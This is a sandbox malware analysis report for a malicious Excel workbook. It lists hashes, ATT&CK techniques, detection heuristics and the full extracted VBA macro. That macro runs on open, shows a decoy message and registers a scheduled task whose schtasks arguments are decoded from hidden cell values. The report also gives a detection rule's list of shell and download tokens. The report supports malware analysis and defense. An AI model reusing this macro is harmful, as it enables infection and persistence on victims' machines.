Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 01d95ccb2311edbb…

MALICIOUS

Office (OOXML) / .XLSX

212.5 KB Created: 2000-04-13 21:48:14 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-07-02
MD5: 0038301925ed068226aadb215ccde46c SHA-1: 9908793b91bdbc503d5c4e29acd922ea6052dad4 SHA-256: 01d95ccb2311edbb6725cd5b1c66fd5816ca686fdba6376dda7671232f73b684
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1053.005 Scheduled Task

The sample contains VBA macros, specifically a Workbook_Open macro, which is a common technique for executing malicious code upon opening an Office document. The macro utilizes CreateObject to interact with the Windows Task Scheduler service, attempting to create a scheduled task. The script also contains a reference to a registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy', suggesting an attempt at persistence. The overall goal appears to be downloading and executing a second-stage payload.

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xLine = CreateObject("Schedule.Service")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3424 bytes
SHA-256: 7426cef2a4a70a70e64ee7efe2e2ec9c568cea2215b9945d4aed15487b3efdec
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
    On Error GoTo xDialogFontProperties
    xCellTypeAllFormatConditions = 1 / 0
xDialogFontProperties:
        If Err.Number <> 0 Then
            xDataTable = "Thank You!"
            MsgBox xDataTable, , "Good", Err.HelpFile, Err.HelpContext
            xWorkbookTab = xPatternAutomatic()
        End If
End Sub

Function xPatternAutomatic()
    Const xOutside = 1
    Const xSubscriber = 0
    Set xLine = CreateObject("Schedule.Service")
    Call xLine.Connect
    Set xSortLabels = xLine.GetFolder(Chr(92))
    Set xAnyGallery = xLine.NewTask(0)
    Set xAbove = xAnyGallery.RegistrationInfo
    xAbove.Description = "Start admin process at a certain time"
    xAbove.Author = "Author Name"
    Set xDialogSaveWorkbook = xAnyGallery.Principal
    xDialogSaveWorkbook.LogonType = 3
    Set xToolbar = xAnyGallery.Settings
    xToolbar.Enabled = True
    xToolbar.StartWhenAvailable = True
    xToolbar.Hidden = False
    Set xDialogListboxProperties = xAnyGallery.Triggers
    Set xErrDiv0 = xDialogListboxProperties.Create(xOutside)
    xPrintErrorsDisplayed = DateAdd("s", 79, Now)
    xDialogShowDetail = xStretch(xPrintErrorsDisplayed)
    xFillFormats = DateAdd("n", 10, Now)
    xSyllabary = xStretch(xFillFormats)
    xQueryTable = DateAdd("s", 300, Now)
    xErrDiv0.StartBoundary = xDialogShowDetail
    xErrDiv0.EndBoundary = xSyllabary
    xErrDiv0.ExecutionTimeLimit = "PT5M"
    xErrDiv0.ID = "TimeTriggerId"
    xErrDiv0.Enabled = True
    Set xDAORecordset = xAnyGallery.Actions.Create(ActionTypeExec)
    xDAORecordset.Path = "schtasks"
    For Each Cell In ActiveWorkbook.Sheets("GlocalSign Protected").Range("BA50:ED111")
        If Cell.Value > 0 Then
            xClipboardFormatPrintPICT = xClipboardFormatPrintPICT & Chr(Cell.Value)
        End If
    Next Cell
    xDialogRowHeight = xClipboardFormatPrintPICT & Format(xQueryTable, "hh:mm")
        Debug.Print xDialogRowHeight
    xDAORecordset.Arguments = xDialogRowHeight
    Call xSortLabels.RegisterTaskDefinition("xDialogWorkbookUnhide", xAnyGallery, 6, , , 3)
End Function

Function xStretch(xDialogPromote)
    xRangeAutoFormatTable4 = "0" & Second(xDialogPromote)
    xExternal = "0" & Minute(xDialogPromote)
    xRangeValueXMLSpreadsheet = "0" & Hour(xDialogPromote)
    xNoButtonChanges = "0" & Day(xDialogPromote)
    xDialogProtectSharing = "0" & Month(xDialogPromote)
    xDialogFormatCharttype = Year(xDialogPromote)
    xErrorBarTypeFixedValue = Right(xRangeValueXMLSpreadsheet, 2) & ":" & Right(xExternal, 2) & ":" & Right(xRangeAutoFormatTable4, 2)
    xTransparent = xDialogFormatCharttype & "-" & Right(xDialogProtectSharing, 2) & "-" & Right(xNoButtonChanges, 2)
    xStretch = xTransparent & "T" & xErrorBarTypeFixedValue
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 16384 bytes
SHA-256: d71e9348c15f28e5ad3001dbba7cf0180ed2451be0ec12e70b6b7c00f6cfbe5b

Open this report in the interactive analyzer, or submit your own file for analysis.